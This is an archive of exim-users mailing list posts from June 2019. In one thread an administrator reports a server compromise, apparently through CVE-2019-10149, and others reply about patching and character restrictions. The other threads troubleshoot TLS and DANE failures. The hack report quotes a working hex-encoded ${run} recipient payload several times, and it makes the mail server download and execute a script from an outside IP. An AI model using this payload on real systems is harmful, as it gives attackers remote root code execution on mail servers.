Re: [exim] just been hacked, could be CVE-2019-10149?
Am 11.06.19 um 08:27 schrieb Odhiambo Washington via Exim-users:
> On Tue, 11 Jun 2019 at 03:19, Calum Mackay via Exim-users <
> exim-users@exim.org> wrote:
>
>> hi all,
>>
>> My mail system has just been hacked; it's running Debian unstable exim
>> 4.91-9
>>
>> Could it be CVE-2019-10149? I don't see any reports of active exploits yet.
>>
>> The reasons I suspect exim involvement:
>>
>> • starting today, every 5 mins getting frozen messages:
>>
>> The following address(es) have yet to be delivered:
>>
>>
>> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
>>
>>
I checked the server i did the restricted chars change for and this is
the result :
2019-06-10 04:31:04 H=(xx.de) [89.248.171.57] F=<> rejected
RCPT
:
Restricted characters in address
\o/ Success ! :D
This attack was presented to you by... the Seychelles Islands.
best regards,
Marius
--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] just been hacked, could be CVE-2019-10149?
You got it.
Why didn't you harden your exim with the "allowed chars" change we posted here
on the list, or did you?
Am 11. Juni 2019 02:10:40 MESZ schrieb Calum Mackay via Exim-users
:
>hi all,
>
>My mail system has just been hacked; it's running Debian unstable exim
>4.91-9
>
>Could it be CVE-2019-10149? I don't see any reports of active exploits
>yet.
>
>The reasons I suspect exim involvement:
>
>• starting today, every 5 mins getting frozen messages:
>
>The following address(es) have yet to be delivered:
>
>root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
>
>Too many "Received" headers - suspected mail loop
>
>• the trojan horse scripts, that were successfully installed on my
>system, with root access, are all group Debian-exim
>
>
>Luckily, it looks like the trojans did nothing more than repeated
>attempts to open up my ssh server to root logins, which I think (and
>hope) didn't actually work, so I may have been lucky, and the damage
>isn't widespread.
>
>
>ought I to be reporting this anywhere?
>
>
>thanks,
>calum.
>
>--
>## List details at https://lists.exim.org/mailman/listinfo/exim-users
>## Exim details at http://www.exim.org/
>## Please use the Wiki with this list - http://wiki.exim.org/
--
Diese Nachricht wurde von meinem Android-Gerät mit K-9 Mail gesendet.
--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] just been hacked, could be CVE-2019-10149?
On Tue, 11 Jun 2019 at 03:19, Calum Mackay via Exim-users <
exim-users@exim.org> wrote:
> hi all,
>
> My mail system has just been hacked; it's running Debian unstable exim
> 4.91-9
>
> Could it be CVE-2019-10149? I don't see any reports of active exploits yet.
>
> The reasons I suspect exim involvement:
>
> • starting today, every 5 mins getting frozen messages:
>
> The following address(es) have yet to be delivered:
>
>
> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
>
> Too many "Received" headers - suspected mail loop
>
> • the trojan horse scripts, that were successfully installed on my
> system, with root access, are all group Debian-exim
>
>
> Luckily, it looks like the trojans did nothing more than repeated
> attempts to open up my ssh server to root logins, which I think (and
> hope) didn't actually work, so I may have been lucky, and the damage
> isn't widespread.
>
>
> ought I to be reporting this anywhere?
>
Whom would you like to report to?? :-)
All vulnerable versions of Exim had a patch released several days ago.
We hope you either applied the patch, or updated to 4.92. If you did none
of those, you are on your own, my fren!
--
Best regards,
Odhiambo WASHINGTON,
Nairobi,KE
+254 7 3200 0004/+254 7 2274 3223
"Oh, the cruft.", grep ^[^#] :-)
--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] A TLS fatal alert has been received.: Insufficient security
Viktor Dukhovni via Exim-users writes > The gmx.de MTAs support DANE in both directions. Does your MX host > have published DANE TLSA records? Are they correct? Is your > certificate still valid, or expired? ... I have an issue that has a similar feel to it. It's with a host of Germanic providers gmx.de, gmx.at, web.de, mailbox.org ... 2019-03-25 09:00:08 1h8LSh-0001oy-Uy DANE attempt failed; TLS connection to mx-ha03.web.de [212.227.15.17]: (certificate verification failed): TLSA record problem: There was error initializing the DNS query. 2019-03-25 09:00:08 1h8LSh-0001oy-Uy DANE attempt failed; TLS connection to mx-ha02.web.de [212.227.17.8]: (certificate verification failed): TLSA record problem: There was error initializing the DNS query. 2019-03-25 09:00:08 1h8LSh-0001oy-Uy == user_1_redac...@web.de R=dnslookup T=remote_smtp defer (-37) H=mx-ha02.web.de [212.227.17.8]: TLS session: (certificate verification failed): TLSA record problem: There was error initializing the DNS query. 2019-03-25 09:22:27 1h8LSp-00020w-Qe DANE attempt failed; TLS connection to mx-ha02.web.de [212.227.17.8]: (certificate verification failed): TLSA record problem: There was error initializing the DNS query. 2019-03-25 09:22:27 1h8LSp-00020w-Qe == user_2_redac...@web.de R=dnslookup T=remote_smtp defer (-37) H=mx-ha02.web.de [212.227.17.8]: I am at a loss since that time. I have lost all my subscribers based at these domains. I was thinking that I may have to set up secure DNS to continue email. > It would be helpful to post your email domainname and server hostname. The sending domain is nep.repec.org, the server is at 5.9.150.131, 2a01:4f8:190:3385::2. -- Cheers, Thomas Krichel http://openlib.org/home/krichel skype:thomaskrichel -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
[exim] just been hacked, could be CVE-2019-10149?
hi all,
My mail system has just been hacked; it's running Debian unstable exim
4.91-9
Could it be CVE-2019-10149? I don't see any reports of active exploits yet.
The reasons I suspect exim involvement:
• starting today, every 5 mins getting frozen messages:
The following address(es) have yet to be delivered:
root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
Too many "Received" headers - suspected mail loop
• the trojan horse scripts, that were successfully installed on my
system, with root access, are all group Debian-exim
Luckily, it looks like the trojans did nothing more than repeated
attempts to open up my ssh server to root logins, which I think (and
hope) didn't actually work, so I may have been lucky, and the damage
isn't widespread.
ought I to be reporting this anywhere?
thanks,
calum.
--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] A TLS fatal alert has been received.: Insufficient security
On Mon, Jun 10, 2019 at 05:51:42PM +0200, Arno Thuber via Exim-users wrote: > The thing is, that it as far as I can see only happens when receiving > messages from the German mail provider GMX. The gmx.de MTAs support DANE in both directions. Does your MX host have published DANE TLSA records? Are they correct? Is your certificate still valid, or expired? ... It would be helpful to post your email domainname and server hostname. -- Viktor. -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] A TLS fatal alert has been received.: Insufficient security
On 10/06/2019 16:51, Arno Thuber via Exim-users wrote: > A TLS > fatal alert has been received.: Insufficient security You might need to ask on a gnutls mailinglist about this. -- Cheers, Jeremy -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
[exim] A TLS fatal alert has been received.: Insufficient security
Hello, today I suddenly started to see log lines telling me "A TLS fatal alert has been received.: Insufficient security". The thing is, that it as far as I can see only happens when receiving messages from the German mail provider GMX. I can send messages to them, I also can send mails from GMX to my other accounts at other mail providers and transmission happens TLS encrypted (using the same ciphers). I also still receive mails over TLS encrypted links from other mail providers. The interesting part of the communication is as follows: gnutls_handshake was successful TLS: checking peer certificate TLS certificate verified: peerdn="C=DE,O=1&1 Mail & Media GmbH,ST=Rhineland-Palatinate,L=Montabaur,CN=mout.gmx.net" cipher: TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256 Have channel bindings cached for possible auth usage. TLS active gnutls_record_recv(0x55de099705b0, 0x55de09d526d0, 4096) GnuTLS<3>: ASSERT: record.c[record_add_to_buffers]:787 GnuTLS<3>: ASSERT: record.c[record_add_to_buffers]:794 GnuTLS<3>: ASSERT: record.c[_gnutls_recv_in_buffers]:1328 GnuTLS<3>: ASSERT: record.c[_gnutls_recv_int]:1473 tls_refill: err from gnutls_record_recv( LOG: MAIN TLS error on connection from mout.gmx.net [212.227.17.22] (recv): A TLS fatal alert has been received.: Insufficient security LOG: smtp_connection MAIN SMTP connection from mout.gmx.net [212.227.17.22] lost D=0s child 4244 ended: status=0x100 normal exit, 1 I didn't upate anything the last days. I'm using Exim 4.92-7~bpo9+1 from Debian with GnuTLS 3.5.8-5+deb9u4. I had hopes I could learn from Marc Merlins issue, but after some similarity for starters it seems to be something different and I'm at a loss. Regards, Arno -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] TLS with gmail started failing
On 10/06/2019 11:12, Richard Jones via Exim-users wrote: > I can't help with your problem, but could I ask specifically how you got > such detailed logging and where it was logged? exim -d-all+tls stderr -- Cheers, Jeremy -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
Re: [exim] TLS with gmail started failing
On Jun 07, Exim Users wrote > With more debug logs enabled, I see > 14:32:02 5341 74.125.141.26 in hosts_avoid_tls? no (end of list) > 14:32:02 5341 SMTP>> STARTTLS > 14:32:02 5341 read response data: size=30 > 14:32:02 5341 SMTP<< 220 2.0.0 Ready to start TLS > 14:32:02 5341 74.125.141.26 in hosts_require_ocsp? no (option unset) > 14:32:02 5341 74.125.141.26 in hosts_request_ocsp? yes (matched "*") > 14:32:02 5341 initialising GnuTLS as a client on fd 9 > 14:32:02 5341 GnuTLS global init required. > 14:32:02 5341 initialising GnuTLS client session > 14:32:02 5341 Expanding various TLS configuration options for session > credentials. Hi, I can't help with your problem, but could I ask specifically how you got such detailed logging and where it was logged? Thanks, Richard -- junix.systems/privacy -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/ ## Please use the Wiki with this list - http://wiki.exim.org/
